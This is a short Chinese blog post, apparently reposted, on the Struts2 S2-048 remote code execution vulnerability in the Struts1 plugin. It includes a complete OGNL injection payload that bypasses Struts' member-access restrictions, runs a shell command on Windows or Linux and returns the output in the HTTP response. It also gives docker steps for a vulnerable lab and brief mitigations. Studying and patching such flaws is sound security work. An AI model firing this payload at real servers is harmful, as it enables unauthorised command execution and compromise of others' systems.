码迷,mamicode.com
首页 > 其他好文 > 详细

s2-048远程代码执行漏洞

时间:2017-07-09 10:43:25      阅读:681      评论:0      收藏:0      [点我收藏+]

标签:lan   tar   efault   利用   ipa   而不是   data   code   art   

在Struts 2.3.x 系列的 Showcase 应用中演示Struts2整合Struts 1 的插件中存在一处任意代码执行漏洞。当你的应用使用了Struts2 Struts1的插件时,可能导致不受信任的输入传入到ActionMessage类中导致命令执行。

POC:

name=%{(#_=‘multipart/form-data‘).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘id‘).(#iswin=(@java.lang.System@getProperty(‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

漏洞利用环境搭建:

利用docker:

docker-compose build
docker-compose up -d

安全完之后直接访问http://0.0.0.0:30081

参考https://github.com/Loneyers/vuldocker/tree/master/struts2/s2-048

解决方案

1.不要启用Struts2-struts1-plugin插件;

2.不要使用showcase.war;

3.始终使用资源键,而不是将原始消息传递给ActionMessage,如下所示,而不要直接传递原始值:

 

s2-048远程代码执行漏洞

标签:lan   tar   efault   利用   ipa   而不是   data   code   art   

原文地址:http://www.cnblogs.com/penguinCold/p/7139449.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!